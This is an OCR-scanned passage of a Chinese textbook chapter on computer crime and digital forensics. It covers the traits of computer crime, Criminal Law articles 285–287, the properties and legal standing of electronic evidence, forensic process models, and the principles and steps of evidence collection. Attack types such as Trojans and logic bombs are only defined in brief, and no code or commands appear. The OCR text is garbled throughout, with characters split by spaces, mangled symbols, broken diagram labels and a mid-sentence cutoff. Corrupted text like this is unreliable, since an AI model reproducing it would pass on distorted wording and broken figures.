计算 机 犯罪 有 主观 原因 和 客观 原因 。 主 观 上 计算 机 用 户 由 于 利益 驱动 .政治 原因 、 成 就 
感 或 好 奇 心 。 客 观 上 由 于 互联 网 安全 性 的 固有 缺陷 .系统 软件 漏洞 色情 业 的 繁荣 .立法 滞 
后 等 。 计 算 机 犯罪 有 如 下 特点 : 

(1) 犯罪 形式 隐蔽 。 一 般 不 受 时 间 和 地 点 限制 ,可 以 通过 网 络 大 幅度 跨 地 域 远程 实现 ， 
其 罪 源 可 来 自 全 球 的 任何 一 个 终端 ,随机 性 很 强 。 

(2) 犯罪 主体 和 手段 的 智能 性 高 。 罪 犯 凭借 高 科技 手段 实施 的 ,具有 相当 丰富 的 计算 
机 技术 知识 和 娴熟 的 计算 机 操作 技能 的 专业 人 员 。 

(3) 复杂 性 。 犯 罪 主 体 和 犯罪 对 象 的 复杂 性 。 

(4) 跨国 性 、 跨 地 域 性 。 因 特 网 通信 使 国界 和 地 理 距离 的 暂时 消失 ,压缩 了 犯罪 的 物理 
空间 。 

(5) 匿名 性 。 网 络 系统 登录 匿名 或 代 名 ,数据 图 像 存 取 匿 名 等 。 

(6) 破获 延 时 性 。 难 以 抓 现 场 犯罪 。 

(7) 损失 评估 难 。 

(8) 犯罪 对 象 广泛 ,罪行 蔓延 迅速 。 

(9) 持 获 利和 探秘 动机 居多 。 各 种 各 样 的 个 人 隐私 商业 秘密 和 军事 秘密 等 都 成 为 计 
算 机 犯罪 的 攻击 对 象 ,侵害 计算 机 信息 系统 的 更 是 层出不穷 。 

(10) 低龄 化 和 内 部 人 员 多 。 年 龄 在 35 岁 以 下 的 人 占 整 个 犯罪 人 数 的 比例 : 1989 年 是 
69.9% ,1990 年 是 73.2%,1991 年 是 75.8%。 其 中 年 龄 最 小 的 只 有 18 岁 。 身 为 银行 或 证 
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券 公司 职员 而 犯罪 的 占 78% ,并 且 绝 大 多 数 为 单位 内 部 的 计算 机 操作 管理 人 员 。 集 中 表现 
为 具有 一 定 专 业 技 术 知识 .能 独立 工作 的 大 .中 专文 化 程度 的 年 轻 人 ,这 类 人 员 占 83%, 案 


发 时 最 大 年 龄 为 34 岁 。 
(11) 巨大 的 社会 危害 性 。 一 起 刑事 案件 的 平均 损失 仅 为 2 000 美元 ,而 一 起 计算 机 犯 
罪案 件 的 平均 损失 高 达 50 万 美元 。 


3. 计算 机 犯罪 的 类 型 

根据 计算 机 犯罪 的 目的 和 国内 外 计算 机 犯罪 的 实际 情况 ,有 学 者 将 计算 机 犯罪 划分 为 
计算 机 操纵 计算 机 间谍 ,计算 机 破坏 、 计 算 机 次 用 和 计算 机 信息 污染 等 类 型 。 

计算 机 操纵 是 指 非法 操纵 计算 机 ,故意 更 改 的 信息 数据 或 程序 以 及 处 理 结果 。 计 算 机 
间谍 是 指 运用 计算 机 技术 非法 刺探 ,收集 或 窃取 数据 或 程序 ,意图 从 中 获取 商业 秘密 或 政治 
军事 情报 获 利 。 计 算 机 破坏 是 指使 用 技术 手段 故意 破坏 计算 机 资产 。 计 算 机 盗用 是 越权 使 
用 他 人 的 计算 机 系统 及 数据 信息 。 信 息 污染 是 指 利用 计算 机 和 网 络 传播 黄色 淫秽 信息 、 谣 
言 和 虚假 信息 诽谤 抹黑 对 手 。 

目前 ,我 国 ( 刑 法 ) 明 确 规 定 的 计算 机 犯罪 如 下 : 

(1) 非法 侵入 计算 机 信息 系统 罪 。《 刑 法 ) 第 285 条 规定 ,违反 国家 规定 ,侵入 国有 事 
务 、 国 防 建 设 、 尖 端 科学 技术 领域 的 计算 机 信息 系统 的 ,处 三 年 以 下 有 期 徒刑 或 者 拘役 。 

(2) 破坏 计算 机 信息 系统 罪 。《 刑 法 ) 第 286 条 规定 ,故意 对 计算 机 信息 系统 功能 进行 
删除 ,修改 ,增加 ,干扰 ,造成 计算 机 信息 系统 不 能 正常 运行 ,后 果 严 重 的 行为 ;故意 对 计算 机 
信息 系统 中 存储 处 理 或 者 传输 的 数据 和 应 用 程序 进行 删除 ,修改 、 增 加 的 操作 ,后 果 严 重 的 
行为 ;故意 制作 ,传播 计算 机 病毒 等 破坏 性 程序 ,影响 计算 机 系统 正常 运行 ,后 果 严 重 的 
行为 。 

(3) 计算 机 信息 诈骗 盗窃 罪 。《 刑 法 ) 第 287 条 规定 了 利用 计算 机 实施 金融 诈骗 .盗窃 、 
贪污 .挪用 公款 、 窃 取 国家 秘密 罪 。 利 用 计算 机 实施 盗窃 的 行为 纳入 盗窃 罪 定罪 处 罚 的 范 
围 ,从 而 使 盗窃 罪 更 具 信息 时 代 的 特征 。 

4. 计算 机 犯罪 的 形式 

计算 机 犯罪 的 形式 多 种 多 样 ,主要 有 如 下 几 种 : 

(1) 数据 欺骗 。 非 法 算 改 输入 输出 数据 获取 个 人 利益 是 最 普通 、 最 常见 的 计算 机 犯罪 
活动 。 发 生 在 金融 系统 的 此 种 计算 机 犯罪 多 为 内 外 勾结 ,串通 作案 ,由 内 部 人 员 修 改 数 据 ， 
外 部 人 员 提 取 钱 款 。 

(2) 意大利 香肠 术 。 侵 吞 存款 利息 余额 尾数 , 积 少 成 多 的 一 种 作案 手段 ,是 金融 系统 计 
算 机 犯罪 的 典型 类 型 。 这 种 方法 很 像 偷 吃香 肠 一 样 ,每 次 偷 吃 一 小 片 并 不 会 引起 人 们 的 注 
意 ,但 是 日 积 月 累 的 数目 也 是 相当 可 观 的 。 

(3) 特洛伊 木马 。 伪 装 成 一 个 实用 工具 或 者 一 个 可 爱 的 游戏 , 诱 使 用 户 将 其 安装 在 PC 
或 者 服务 器 上 ,从 而 控制 该 计算 机 系统 。 

(4) 冒名 顶替 。 利 用 别人 账号 和 口令 , 窃 用 计算 机 谋取 个 人 私利 的 做 法 。 

(5) 废物 清洗 。 从 计算 机 系统 周围 废弃 物 ( 如 磁盘 .打印 资料 ) 中 清理 获取 信息 的 一 种 
方法 。 计 算 机 用 户 的 所 谓 废弃 物 中 可 能 含有 不 愿 泄 漏 的 信息 资料 。 

(6) 逻辑 炸弹 。 指 插入 用 户 程序 中 的 一 些 异常 指令 编码 ,该 代码 在 特定 时 刻 或 特定 条 
件 下 执行 破坏 作用 ,所 以 称 为 逻辑 炸弹 或 定时 炸弹 。 逻 辑 炸 弹 是 计算 机 信息 系统 安全 的 潜 
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在 威胁 和 隐患 ,主要 是 计算 机 工作 人 员 为 保护 自身 利益 ,和 单位 或 领导 对 抗 而 采用 的 一 种 报 
复 行为 。 一 些 程序 的 开发 者 也 常 在 程序 中 加 入 逻辑 炸弹 以 期 打击 盗版 者 。 


12.2 计算 机 电子 证 据 


1. 定义 

电子 证 据 是 基于 电子 技术 生成 ,以 数字 化 形式 存在 于 磁盘 光盘、 存储 卡 和 手机 等 各 种 
电子 设备 载体 ,其 内 容 可 与 载体 分 离 ,并 可 多 次 复制 到 其 他 载体 的 文件 。 因 此 电子 证 据 具 有 
三 个 基本 特征 : 数字 化 的 存在 形式 ;不 固定 依附 特定 的 载体 ;可 以 多 次 原样 复制 。 

计算 机 证 据 是 指 以 计算 机 的 处 理 形式 存在 ,能 用 作证 据 的 一 切 材 料及 其 派生 物 。 计 算 
机 证 据 主 要 包括 电子 计算 机 处 理 的 数字 数据 ,因此 也 称 为 电子 证 据 或 数字 证 据 , 但 其 外 延 还 
包括 以 机 械 式 计算 机 ,光学 计算 机 、 生 物 计算 机 为 基础 的 证 据 。 有 时 候 ,电子 证 据 在 外 延 上 
也 可 能 大 于 计算 机 证 据 , 如 固定 电话 机 等 电子 设备 录制 的 通信 资料 就 属于 电子 证 据 而 不 属 
于 计算 机 证 据 。 

数字 证 据 (Digital Evidence) 就 是 在 计算 机 或 在 计算 机 系统 运行 过 程 中 产生 的 ,以 其 记 
录 的 内 容 来 证 实 案件 事实 的 电磁 记录 , 即 具有 侦查 作用 和 证 据 价 值 的 电子 数据 。 

一 般 来 讲 , 以 计算 机 科学 为 背景 的 人 多 使 用 计算 机 证 据 或 数字 证 据 , 而 法 律 界 多 使 用 电 
子 证 据 。 虽 然 计算 机 证 据 、 电 子 证 据 在 概念 和 外 延 上 有 一 定 的 差异 ,但 一 般 而 言 可 以 不 严格 
区 分 。 因 此 ,在 计算 机 取证 的 范畴 ,人 们 一 般 普遍 认可 将 计算 机 证 据 、 数 字 证 据 和 电子 证 据 
不 加 区 分 。 

2. 电子 证 据 分 类 

根据 数据 的 文件 形式 ,电子 证 据 可 以 分 为 : 

(1) 字 处 理 文件 。 通 过 文字 处 理 系统 形成 的 文件 ,由 文字 标点、 表格、 各 种 符号 或 其 他 
编码 文本 组 成 。 不 同类 型 的 文字 处 理 软件 .系统 .代码 连同 文本 内 容 一 起 构成 了 字 处 理 文件 
的 基本 要 素 。 

(2) 图 形 处 理 文件 。 由 计算 机 专门 的 软件 系统 辅助 设计 或 辅助 制造 的 图 形 数据 ,通过 
图 形 人 们 可 以 直观 地 了 解 非 连续 性 数据 间 的 关系 ,使 得 复杂 的 信息 变 得 生动 明晰 。 

(3) 数据 库 文件 。 由 若干 原始 数据 记录 所 组 成 的 文件 。 数 据 库 系统 的 功能 是 输入 和 存 
储 数据 查询 记录 以 及 按照 指令 输出 结果 , 它 具 有 很 高 的 信息 价值 ,但 只 有 经 过 整理 汇总 之 
后 才 具 有 实际 的 用 途 和 价值 。 

(4) 程序 文件 。 计 算 机 进行 人 机 交流 的 工具 ,软件 就 是 由 若干 个 程序 文件 组 成 的 。 

(5) 影音 、 像 文件 。 即 通常 所 说 的 “多 媒体 "文件 ,通常 经 过 扫描 识别 、 视 频 捕捉 和 音频 
录入 等 综合 编辑 而 成 。 

(6) 其 他 数据 文件 。 如 日 志 、 交 换 数据 文件 等 。 

3. 电子 证 据 的 特点 

与 传统 证 据 相 比 ,电子 证 据 具 有 以 下 新 的 特性 : 

(1) 依附 性 。 电 子 证 据 不 会 像 传统 的 证 据 那样 可 以 独立 存在 ,依附 在 不 同 介质 上 ,如 系 
统 的 计算 机 、 网 络 设备 .数码 相机 、 便 携 电子 设备 .手机 ,以 及 其 他 计算 机 处 理 辅助 设备 如 打 
印 机 、 扫 描 仪 .复印 机 、 传 真 机 、 读 卡 机 和 全 球 定位 仪 等 。 
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(2) 多 样 性 。 不 同 介质 的 电子 证 据 有 不 同 的 形态 信息 表现 ,因此 电子 证 据 综合 了 文本 、 
图 形 、 图 像 动 画 、 音 频 及 视频 等 多 种 媒体 信息 ,这 种 以 多 媒体 形式 存在 的 计算 机 证 据 几 乎 涵 
盖 了 所 有 传统 证 据 类 型 。 


(3) 可 伪 性 。 计 算 机 信息 是 二 进 制 表示 的 ,以 非 连续 的 数字 信和 号 的 方式 存在 ,可 以 故意 
或 因为 差错 对 计算 机 的 数据 进行 变更 ,删除 .剪接 和 监听 等 ,从 而 可 能 伪造 证 据 。 

(4) 弱 证 明 性 。 数 字 证 据 的 非 实物 性 ,使 得 其 窃取 、 修 改 甚至 销毁 都 比较 容易 。 例 如 黑 
客 在 入侵 之 后 对 现场 进行 掩 迹 工 作 ,使 计算 机 证 据 与 特定 主体 之 间 的 关联 难以 确定 ,给 证 据 
的 认定 带 来 困难 ,直接 减低 了 证 明 力 度 , 增 加 了 跟踪 和 侦查 的 难度 。 

(5) 非 直观 性 。 数 字 证 据 在 计算 机 系统 中 可 存在 的 范围 很 广 ,使 证 据 很 容易 被 隐藏 。 
同时 ,数字 证 据 以 二 进 制 形式 编码 ,无 法 直接 阅读 和 进行 关联 推理 ,必须 借助 适当 的 工具 收 


集 和 分 析 。 


(6) 易 逝 性 。 计 算 机 系统 处 理 的 动态 数据 有 一 定 的 时 间 效 应 ,可 能 因 加 电 或 失 电 而 失 
效 或 消失 。 某 些 动态 数据 对 数字 证 据 的 收集 非常 重要 。 表 12. 1 描述 了 数字 证 据 数据 的 挥 
发 性 , 表 12. 2 为 电子 证 据 与 传统 证 据 的 区 别 。 


表 12.1 电子 证 据 数据 的 挥发 性 


数 据 硬件 或 位 置 存活 时 间 
CPU 高 速 缓冲 器 ,管道 几 个 时 钟 周期 
系统 RAM 关机 前 
内 核 表 进程 中 关机 前 
固定 介质 Swap/tmp 直至 被 覆盖 或 被 抹 掉 
可 移动 介质 Cdrom,Floppy,HDO 直至 被 覆盖 或 被 抹 掉 
打印 输出 被 复制 打印 输出 直至 被 毁坏 
表 12.2 电子 证 据 与 传统 证 据 的 区 别 
电子 证 据 传统 证 据 
存在 形式 电子 化 数据 或 文件 有 形 物品 
可 见 性 借助 工具 间接 可 见 直接 肉眼 可 见 
收集 可 改变 性 可 能 造成 严重 的 修改 不 会 或 很 少 改变 
时 间 性 随时 间 跟 随 系统 改变 不 会 或 很 少 改变 


4. 电子 证 据 的 法 律 效力 


证 据 在 司法 证 实 中 的 作用 是 址 庸 置 疑 的 , 它 是 法 官 判定 罪 与 非 罪 、 此 罪 与 彼 罪 的 标准 。 
任何 材料 要 成 为 证 据 , 均 需 具备 三 个 特性 , 即 客观 性 、 关 联 性 和 合法 性 。 

关联 性 主要 指证 据 与 案件 争议 和 理由 的 联系 程度 ,这 属于 法 官 裁判 的 范围 。 合 法 性 主 
要 包括 证 据 的 形式 ,收集 手段 .是 否 侵犯 他 人 权益 ,取证 工具 是 否 合法 等 。 客 观 (真实 ) 性 指 


民事 诉讼 法 和 相关 司法 解释 都 要 求 提 供 “ 原 件 ”( 书 面 文件 ) 。 


另外 ,证 据 还 需 具备 证 明 力 。 证 明 力 是 指证 据 对 证 明 案件 事实 所 具有 的 效力 , 即 该 证 据 
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是 否 能 够 直接 证 明 案件 事实 还 需要 其 他 证 据 配合 综合 认定 。《 民 事 诉讼 法 ) 第 63 条 规定 ,法 
定 证 据 有 书证 ,物证 ,视听 资料 ,证 人 证 言 、 当 事 人 陈述 、 鉴 定 结论 和 勘 验 笔录 7 种 。 而 数字 
证 据 可 以 是 第 8 种 , 须 采用 数字 签名 的 方法 防止 被 自 改 和 冒 认 。 

电子 证 据 在 计算 机 犯罪 的 口供 , 勘 验 笔录 .证 人 证 言 和 鉴定 结论 等 侦破 步骤 中 起 佐证 和 
直接 证 明 的 作用 。 在 实际 案件 中 ,电子 数据 一 般 需 要 经 过 鉴定 才能 成 为 诉讼 的 直接 证 据 。 
法 学 界 认 为 ,电子 数据 必须 经 过 关联 性 、 合 法 性 和 真实 性 的 检验 才能 作为 定案 的 根据 。 

(1) 电子 数据 的 认定 和 采信 。 为 保证 电子 数据 的 证 据 能 力 , 首 先 将 电子 数据 转化 为 法 
定 证 据 形式 。 实 际 上 通常 将 电子 数据 转换 为 书证 、 鉴 定 结 论 、 勘 验 报告 和 视听 材料 。 

人 以 勘 验 报告 的 形式 认定 信息 的 存在 性 , 勘 验 报告 在 取证 过 程 中 主要 是 证 实 嫌疑 人 的 
计算 机 中 存 有 何 种 内 容 。 

@ 以 鉴定 结论 的 形式 提供 分 析 证 明 的 证 据 , 电 子 数据 本 身 可 以 作为 鉴定 结论 的 附件 形 
式 提交 。 

@ 以 书证 和 视听 材料 的 形式 展示 电子 数据 表达 的 内 容 , 由 证 人 或 嫌疑 人 在 这 些 内 容 上 
签字 形成 书证 材料 。 

(2) 电子 数据 的 合法 性 。 要 求证 据 提 取 、 形 成 过 程 遵循 规定 的 程序 ,以 保证 数字 化 证 据 
的 合法 性 。 

人 电子 证 据 的 原始 性 。 原 始 性 的 证 明 可 通过 自 认 方式 .证 人 有 具 结 方式 .推定 方式 和 鉴 
定 方式 。 

@ 电子 数据 的 完整 性 。 保 证 电子 数据 本 身 的 完整 性 和 电子 数据 所 依赖 的 计算 机 系统 
的 完整 性 , 指 在 现场 采集 获得 的 数据 没有 被 算 改 ,可 通过 对 数据 计算 完整 性 校 验 或 对 原始 证 
物 封存 加 以 保证 。 

@ 技术 手段 的 科学 性 。 在 实施 电子 数据 勘 验 、 检 查 时 使 用 的 软 硬 件 以 及 相应 的 勘 验 、 
检查 流程 要 求 符合 科学 原理 , 勘 验 ,检查 流程 能 够 经 得 起 现实 的 考验 。 

@ 勘 验 ,检查 操作 的 可 再 现 特性 。 应 当 对 期 验 、 检 查 人 员 对 数字 化 证 据 的 提取 、 处 理 、 
存储 ,运输 过 程 有 详细 的 审计 记录 。 

(3) 电子 数据 的 证 明 力 。 证 明 力 就 是 要 保证 证 据 与 待 证 事实 之 间 的 关联 性 , 即 证 据 与 
结论 之 间 是 否 符合 逻辑 。 

@ 证 据 分 析 原理 的 科学 性 和 逻辑 性 。 即 对 电子 数据 事实 分 析 所 依赖 的 软 硬 件 .技术 原 
理 符合 科学 原理 ,能 够 经 受 事实 的 考验 。 同 时 ,也 要 求 从 证 据 到 结论 这 一 过 程 符 合 逻 辑 ,“ 任 
何 科 学 都 是 应 用 逻辑 ”, 是否 符合 形式 逻辑 的 一 般 准 则 是 推断 证 据 运 用 是 否 科 学 的 重要 
依据 。 

@ 分 析 过 程 可 再 现 。 根 据 相同 的 分 析 原 理 ,在 相同 的 数字 化 证 据 集合 上 进行 分 析 , 不 
管 任 何人 只 要 遵循 相同 的 分 析 规 则 都 能 够 得 到 相同 的 结论 。 在 实际 中 不 仅 要求 取 证 人 员 对 
直接 分 析 过 程 提供 详细 的 审计 记录 ,还 要 求 任何 其 他 人 根据 其 提供 的 审计 记录 实施 相同 的 
操作 能 够 得 到 相同 的 分 析 结 论 。 

@ 数字 取证 工具 的 合法 性 。 每 种 数字 取证 工具 都 是 一 个 程序 ,按照 Daubert 测试 , 数 
字 取 证 工具 有 可 测试 性 ,出错 率 、 公 开 性 和 可 接受 性 4 个 合法 性 特点 。 

@ 数字 取证 过 程 的 合法 性 。 数 字 取 证 的 全 过 程 是 否 有 法 律 方面 的 人 员 陪 同和 全 程 
监督 。 


462 


数字 取证 技术 


12.3 计算 机 取证 


12.3.1 计算 机 取证 定义 


Lee Garber 认为 ,计算 机 取证 是 分 析 硬 盘 驱 动 . 光 盘 、 软 盘 .ZIP 和 Jazz 磁盘 、 内 存 缓冲 
区 以 及 其 他 形式 的 储存 介质 ,以 发 现 犯罪 证 据 的 过 程 。 

资深 取证 专家 Judd Robbins 认为 ,计算 机 取证 是 将 计算 机 调查 和 分 析 技 术 应 用 于 对 洪 
在 的 、 有 法 律 效力 的 证 据 的 确定 与 获取 。 

New Technologies 公司 扩展 了 该 定义 ,认为 计算 机 取证 包括 了 对 以 磁 介质 编码 信息 方 
式 存储 的 计算 机 证 据 的 保护 ,确认 ,提取 和 归档 。 

SANS 公司 则 归结 为 ,计算 机 取证 是 使 用 软件 和 工具 ,按照 一 些 预 先 定义 的 程序 ,全 面 
地 检查 计算 机 系统 ,以 提取 和 保护 有 关 计 算 机 犯罪 的 证 据 。 

我 国学 者 定义 ,计算 机 取证 是 使 用 软件 和 工具 ,按照 一 些 预先 定义 的 程序 全 面 地 检查 计 
算 机 系统 ,对 以 磁 介 质 编码 信息 方式 存储 的 计算 机 证 据 的 保护 ,确认 、 提 取 和 归档 。 简 单 地 
说 ,计算 机 取证 就 是 通过 技术 手段 ,准确 高 效 地 从 计算 机 及 网 络 设备 上 搜索 并 提取 计算 机 犯 
罪 的 证 据 , 并 且 能 够 保证 不 对 原 介质 造成 任何 影响 ,提取 的 证 据 要 经 过 签名 验证 ,保证 不 被 
自 改 。 

广义 上 ,计算 机 取证 是 发 现 计 算 机 及 其 相关 设备 中 有 利于 计算 机 事件 调查 的 数据 ,并 提 
取 、 保 护 、 保 存 的 过 程 。 

狭义 上 ,计算 机 取证 是 能 够 为 法 庭 接 受 的 ,原始 的 ,完整 的 有 说 服 力 的 ,存在 于 计算 机 
和 相关 外 设 中 的 电子 证 据 的 提取 ,保护 和 保存 的 过 程 。 


12.3.2 计算 机 取证 模型 


计算 机 取证 既 要 遵从 法 律 标准 ,取得 的 电子 证 据 要 符合 法 律 法 规 ;也 要 遵从 信息 技术 标 
准 , 取 证 的 过 程 . 取 得 的 数据 及 其 分 析 要 符合 技术 原理 。 

计算 机 取证 模型 指导 计算 机 取证 更 加 规范 ,分 为 静态 的 和 动态 的 。 

1. 计算 机 取证 的 技术 模型 

(1) 传统 静态 取证 模型 。 如 图 12. 1 所 示 , 对 计算 机 系统 进行 检测 ,发现 受到 攻击 后 ,对 
系统 进行 全 面 检 查 , 收 集 证 据 、 备 份 、 分 析 , 最 后 将 原始 证 据 和 分 析 结 果 提 交 给 法 律 机 构 


裁判 。 
发 现 改 击 。_[ 检查 系统 ea | 证 据 a 
-| 妖 烙 区 -| im pr 法 健 拓 


图 12.1 传统 静态 取证 模型 


(2) 动态 取证 模型 。 动 态 取 证 主要 是 针对 网 络 正 在 进行 的 攻击 取证 ,如 图 12. 2 所 示 。 

2. 法 律 执行 过 程 模型 (Law Enforcement Process Model) 

美国 司法 部 “电子 犯罪 现场 调查 指南 ”中 提出 ,基于 标准 的 物理 犯罪 (Physical Crime) 现 
场 调查 过 程 模型 ,分 为 以 下 5 个 阶段 : 
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网 络 与 | 发 现 攻击 | 响应 系统 | _| <， -| | ， 证 据 | 
系统 监控 收集 证 据 | “| 备份 证 据 | “| 分 析 证 据 | 分析 结果 “| 法 律 才 判 


图 12.2 动态 取证 模型 


(1) 准备 阶段 (Preparation) 。 在 调查 之 前 ,准备 好 所 需 设 备 和 工具 。 

(2) 收集 阶段 (Collection)。 搜 索 和 定位 计算 机 证 据 ;保护 和 评估 现场 ,保护 现场 人 员 
的 安全 ,保证 证 据 的 完整 性 ,识别 潜在 的 证 据 ;对 现场 物证 等 进行 记录 ,归档 ; 全 部 复制 或 提 
取 计 算 机 系统 中 的 证 据 。 

(3) 检验 (Examination) 。 对 可 能 存在 的 证 据 进行 校 验 和 分 析 。 

(4) 分 析 (Analysis) 。 对 检验 结果 进行 复审 和 再 分 析 , 提 取 对 案件 有 价值 的 信息 。 

(5) 报告 (reporting)。 对 分 析 检验 结果 汇总 .提交 、 证 据 出 示 。 

3. 过程 抽象 模型 (An Abstract Process Model) 

美国 空军 研究 院 对 计算 机 取证 的 基本 方法 和 理论 进行 研究 后 提出 的 模型 。 

(1) 识别 (Identification) 。 侦 测 安全 事件 或 犯罪 。 

(2) 准备 (Preparation)。 准 备 工 具 、 技 术 及 所 需 的 许可 。 

(3) 策略 制定 (Approach Strategy) 。 制 定 策略 来 最 大 限度 地 收集 证 据 和 减少 对 受害 者 
的 影响 。 

(4) 保存 (Preservation) 。 隔 离 并 保护 物理 和 数字 证 据 。 

(5) 收集 (Collection) 。 记 录 物 理 犯 罪 现场 并 复制 数字 证 据 。 

(6) 检验 (Examination) 。 查 找 犯罪 相关 证 据 。 

(7) 分 析 (Analysis) 。 对 检验 结果 进行 再 分 析 , 给 出 分 析 结果 。 并 重复 检验 过 程 ,直到 
分 析 结果 有 充分 的 证 据 及 理论 的 支持 。 

(8) 提交 (Presentation) 。 总 结 并 对 结论 及 所 用 理论 提供 合理 的 解释 。 

4. 计算 机 取证 新 模型 

目前 法 庭 案例 中 出 现 的 计算 机 证 据 都 比较 简单 ,多 是 文档 .电子 邮件 和 程序 源 代 码 等 不 
需 特殊 工具 就 可 以 取得 的 信息 。 但 随 着 技术 的 进步 ,计算 机 犯罪 的 水 平 也 在 不 断 提高 ,目前 
的 计算 机 取证 技术 已 不 能 满足 打击 计算 机 犯罪 ,保护 网 络 与 信息 安全 的 要 求 。 因 此 提出 了 
计算 机 取证 的 层次 模型 ,将 计算 机 取证 分 为 证 据 发 现 层 \ 证 据 固定 层 、 证 据 提取 层 \ 证 据 分 析 
层 和 证 据 表 达 层 5 个 层次 。 

多 维 计算 机 取证 模型 (Multi Dimension Forensics Model, MDFM) 增 加 了 时 间 约 束 和 
对 计算 机 取证 过 程 的 监督 , 较 好 地 解决 了 取证 策略 随 犯罪 手段 更 新 变化 的 问题 和 所 提交 的 
证 据 的 可 靠 性 .关联 性 和 合法 性 的 问题 。 


12.3.3 计算 机 取证 的 主要 原则 


对 于 电子 证 据 应 尽早 搜集 证 据 , 并 保证 其 没有 受到 任何 破坏 。 分 析 计 算 机 数据 与 案件 
事实 有 无 关联 ,关联 程度 如 何 , 是 否 实质 性 关联 ,数据 是 否 被 伪造 .变化 或 剪辑 .修改 过 。 实 
施 数字 取证 应 当 遵循 符合 程序 .共同 监督 .保护 隐私 .影响 最 小 .证 据 连 续 、 原 汁 原味 等 原则 。 
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(1) 符合 程序 。 符 合 程序 是 指 取 证 应 当 首先 启动 法 律 程序 ,要 在 法 律 规定 的 范围 内 展 
开工 作 , 和 否则 会 陷 人 被 动 。 

(2) 共同 监督 。 指 由 原告 委派 的 专家 所 进行 整个 的 检查 、 取 证 过 程 ,必须 受到 由 其 他 方 
委派 的 专家 的 监督 。 

(3) 保护 隐私 。 指 在 取证 过 程 中 ,要 尊重 任何 关于 客户 代理 人 的 隐私 。 一 旦 获取 了 一 
些 关于 公司 或 个 人 的 隐私 , 决 不 能 泄露 。 

(4) 影响 最 小 。 指 如 果 取 证 要 求 必须 运行 某 些 业务 程序 ,应 当 使 运行 时 间 尽量 短 ; 必 须 
保证 取证 不 给 系统 带 来 副作用 ,如 引进 病毒 等 。 

(5) 证 据 连续 。 指 必须 保证 证 据 的 连续 性 (Chain of Custody) , 即 在 将 证 据 提 交 法 庭 前 
要 一 直 跟 踪 证 据 , 要 向 法 庭 说 明 在 这 段 时 间 内 证 据 有 无 变化 和 该 证 据 的 完全 性 。 

(6) 原 汁 原 味 。 指 必须 保证 提取 出 来 的 证 据 不 受 电磁 或 机 械 的 损害 .不 被 取证 程序 
破坏 。 


12.3.4 计算 机 取证 的 基本 步骤 


1. 数字 证 据 的 信息 源 

数字 证 据 的 信息 源 包括 日 志文 件 .进程 ,账户 .系统 状态 .网 络 连接 和 存储 介质 等 。 

(1) 日 志 。 如 操作 系统 日 志 数据库 日 志 等 。 

(2) 文件 。 搜 索 目 标 系统 中 的 所 有 文件 ,包括 现存 的 正常 文件 .已 经 被 删除 但 仍 存在 于 
磁盘 上 还 没有 被 覆盖 的 文件 .隐藏 文件 . 受 密码 保护 的 和 加 密 文 件 ;尽量 恢复 所 发 现 的 文件 ; 
在 法 律 允许 的 情况 下 ,访问 被 保护 或 加 密 的 文件 ;分 析 磁 盘 特 殊 区 域 (未 分 配 区 域 ,文件 栈 
区 等 ) 。 

(3) 系统 进程 。 如 进程 名 、 进 程 访问 文件 等 。 

(4) 用 户 。 特 别 是 在 线 用 户 的 服务 时 间 、 使 用 方式 等 。 

(5) 系统 状态 。 如 系统 开放 的 服务 、 网 络 运行 的 状态 等 。 

(6) 通信 连接 记录 。 如 网 络 路 由 器 的 运行 日 志 等 。 

(7) 存储 介质 。 如 磁盘 .光盘 和 闪存 等 。 

2. 基本 步骤 

取证 的 基本 步骤 包括 保护 现场 ,证 据 搜索 与 发 现 , 证 据 确认 与 固定 ,证 据 提取 ,证 据 分 析 
和 证 据 提交 。 

(1) 保护 现场 。 在 取证 过 程 中 ,保护 取证 的 目标 系统 ,避免 发 生 任何 改变 、 损 害 ; 保 护 证 
据 的 完整 性 ,防止 证 据 信 息 的 丢失 和 破坏 ;防止 病毒 感染 。 

(2) 证 据 搜索 与 发 现 。 证 据 发 现 首先 要 识别 可 获取 证 据 的 信息 类 型 ,按照 证 据 信 息 变 
化 的 特点 ,可 以 将 证 据 信 息 分 为 实时 易 失信 息 ( 如 网 络 连接 、 内 存 信息 ) 和 非 易 失信 息 ( 如 文 
件 ) 两 大 类 ,通过 搜索 发 现 证 据 信息 。 

(3) 证 据 确认 与 固定 。 与 犯罪 行为 相关 的 数据 记录 确认 ,针对 数字 证 据 的 易 失 性 ,数字 
证 据 的 固定 非常 重要 。 

(4) 证 据 提取 。 证 据 提取 包括 原始 数据 和 证 据 的 特征 提取 ,一 般 采取 克隆 、 找 贝 或 者 过 
滤 , 挖 掘 、 解 码 等 技术 ,对 软件 或 数据 碎片 进行 残缺 分 析 、 上 下 文 分 析 , 恢 复原 来 的 面貌 。 
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(5) 证 据 分 析 。 对 提取 的 证 据 进行 分 析 , 重 构 犯 罪行 为 ,确定 犯罪 动机 以 及 系统 受害 程 
度 等 。 进 行 系统 分 析 和 网 络 分 析 , 得 到 相关 的 分 析 报 表 , 如 图 12. 3 所 示 。 


了 系统 信息 和 网 络 数 
机 据 相关 分 析 模块 分 
9 | 
录 表 


网 络 数据 

分 析 模块 
数据 包 的 统计 

分 析 及 显示 


图 12.3 数字 证 据 分 析 


网 络 攻击 的 
分 析 和 识别 


应 用 数据 的 
还 原 及 显示 


(6) 证 据 存 档 和 提交 。 以 加 密 文件 形式 保存 ,防止 丢失 或 被 别人 算 改 ;并 向 律师 ,管理 
者 或 法 庭 提交 证 据 。 这 时 要 注意 使 用 规定 的 法 律 文书 格式 和 术语 。 

3. 取证 注意 事项 

(1) 在 取证 检查 中 ,应 保护 目标 计算 机 系统 ,避免 发 生 任何 的 改变 ,伤害 ,数据 破坏 或 病 
毒 感染 。 

(2) 搜索 目标 系统 中 的 所 有 文件 。 包 括 现存 的 正常 文件 .已 经 被 删除 但 仍 存在 于 磁盘 
上 ( 即 还 没有 被 新 文件 覆盖 ) 的 文件 ,隐藏 文 件 、 受 到 密码 保护 的 文件 和 加 密 文件 。 

(3) 全 部 (或 尽 可 能 ) 恢 复发 现 的 已 删除 文件 。 

(4) 最 大 程度 地 显示 操作 系统 或 应 用 程序 使 用 的 隐藏 文件 ,临时 文件 和 交换 文件 的 
内 容 。 

(5) 如 果 可 能 并 且 法 律 允许 ,访问 被 保护 或 加 密 文件 的 内 容 。 

(6) 分 析 在 磁盘 的 特殊 区 域 中 发 现 的 所 有 相关 数据 。 特 殊 区 域 包括 : 未 分 配 磁 盘 空 
间 。 虽 然 目前 没有 被 使 用 ,但 可 能 包含 有 先前 的 数据 残留 。 文 件 中 的 Slack 空间 。 如 果 文 
